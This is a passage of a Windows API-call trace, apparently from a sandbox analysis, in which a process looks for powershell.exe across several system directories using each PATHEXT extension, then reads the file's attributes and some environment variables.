	[0816.472] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.473] SetErrorMode (uMode=0x1) returned 0x1
	[0816.473] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0816.473] SetErrorMode (uMode=0x1) returned 0x1
	[0816.473] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.474] SetErrorMode (uMode=0x1) returned 0x1
	[0816.474] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0816.487] SetErrorMode (uMode=0x1) returned 0x1
	[0816.487] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.487] SetErrorMode (uMode=0x1) returned 0x1
	[0816.488] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0816.488] SetErrorMode (uMode=0x1) returned 0x1
	[0816.488] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.488] SetErrorMode (uMode=0x1) returned 0x1
	[0816.488] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0816.489] SetErrorMode (uMode=0x1) returned 0x1
	[0816.489] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.489] SetErrorMode (uMode=0x1) returned 0x1
	[0816.489] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0816.489] SetErrorMode (uMode=0x1) returned 0x1
	[0816.489] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.490] SetErrorMode (uMode=0x1) returned 0x1
	[0816.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0816.490] SetErrorMode (uMode=0x1) returned 0x1
	[0816.490] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.490] SetErrorMode (uMode=0x1) returned 0x1
	[0816.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0816.491] SetErrorMode (uMode=0x1) returned 0x1
	[0816.491] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.491] SetErrorMode (uMode=0x1) returned 0x1
	[0818.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0818.085] SetErrorMode (uMode=0x1) returned 0x1
	[0818.085] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.085] SetErrorMode (uMode=0x1) returned 0x1
	[0818.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0818.086] SetErrorMode (uMode=0x1) returned 0x1
	[0818.086] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.086] SetErrorMode (uMode=0x1) returned 0x1
	[0818.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0818.086] SetErrorMode (uMode=0x1) returned 0x1
	[0818.086] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.087] SetErrorMode (uMode=0x1) returned 0x1
	[0818.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0818.087] SetErrorMode (uMode=0x1) returned 0x1
	[0818.087] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.087] SetErrorMode (uMode=0x1) returned 0x1
	[0818.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0818.088] SetErrorMode (uMode=0x1) returned 0x1
	[0818.088] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.088] SetErrorMode (uMode=0x1) returned 0x1
	[0818.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0818.088] SetErrorMode (uMode=0x1) returned 0x1
	[0818.088] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.089] SetErrorMode (uMode=0x1) returned 0x1
	[0818.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0818.089] SetErrorMode (uMode=0x1) returned 0x1
	[0818.089] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.089] SetErrorMode (uMode=0x1) returned 0x1
	[0818.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0818.090] SetErrorMode (uMode=0x1) returned 0x1
	[0818.090] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.090] SetErrorMode (uMode=0x1) returned 0x1
	[0818.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0818.090] SetErrorMode (uMode=0x1) returned 0x1
	[0818.090] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.091] SetErrorMode (uMode=0x1) returned 0x1
	[0818.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0818.091] SetErrorMode (uMode=0x1) returned 0x1
	[0818.091] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.091] SetErrorMode (uMode=0x1) returned 0x1
	[0818.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0818.092] SetErrorMode (uMode=0x1) returned 0x1
	[0818.092] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.092] SetErrorMode (uMode=0x1) returned 0x1
	[0818.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0818.092] SetErrorMode (uMode=0x1) returned 0x1
	[0818.093] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.093] SetErrorMode (uMode=0x1) returned 0x1
	[0818.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0818.093] SetErrorMode (uMode=0x1) returned 0x1
	[0818.093] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.093] SetErrorMode (uMode=0x1) returned 0x1
	[0818.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0818.094] SetErrorMode (uMode=0x1) returned 0x1
	[0818.094] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.094] SetErrorMode (uMode=0x1) returned 0x1
	[0818.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0818.095] SetErrorMode (uMode=0x1) returned 0x1
	[0818.095] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.095] SetErrorMode (uMode=0x1) returned 0x1
	[0818.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0818.095] SetErrorMode (uMode=0x1) returned 0x1
	[0818.095] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.096] SetErrorMode (uMode=0x1) returned 0x1
	[0818.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0818.096] SetErrorMode (uMode=0x1) returned 0x1
	[0818.096] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.096] SetErrorMode (uMode=0x1) returned 0x1
	[0818.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c67dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0818.097] SetErrorMode (uMode=0x1) returned 0x1
	[0818.097] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c67df20 | out: lpFindFileData=0x1c67df20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x2ce5f0
	[0818.098] FindNextFileW (in: hFindFile=0x2ce5f0, lpFindFileData=0x1c67df30 | out: lpFindFileData=0x1c67df30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0818.098] FindClose (in: hFindFile=0x2ce5f0 | out: hFindFile=0x2ce5f0) returned 1
	[0818.098] SetErrorMode (uMode=0x1) returned 0x1
	[0818.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c67e040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0818.099] SetErrorMode (uMode=0x1) returned 0x1
	[0818.099] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c67e250 | out: lpFileInformation=0x1c67e250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0818.099] SetErrorMode (uMode=0x1) returned 0x1
	[0818.100] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0818.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0818.100] CoTaskMemFree (pv=0x2b1b20) 
	[0818.102] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0818.102] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0818.102] CoTaskMemFree (pv=0x2b1b20) 
	[0818.105] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0818.105] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0818.105] CoTaskMemFree (pv=0x2b1b20) 
	[0818.115] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0818.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0818.115] CoTaskMemFree (pv=0x2b1b20) 
	[0818.128] CoTaskMemAlloc (cb=0x3b) returned 0x2c6540
	[0818.128] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c67e438, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c67e438) returned 0x4550
	[0819.378] CoTaskMemFree (pv=0x2c6540) 
	[0819.381] GetConsoleWindow () returned 0x10404
	[0819.389] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0819.389] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0819.389] CoTaskMemFree (pv=0x2b1b20) 
	[0819.390] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0819.390] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
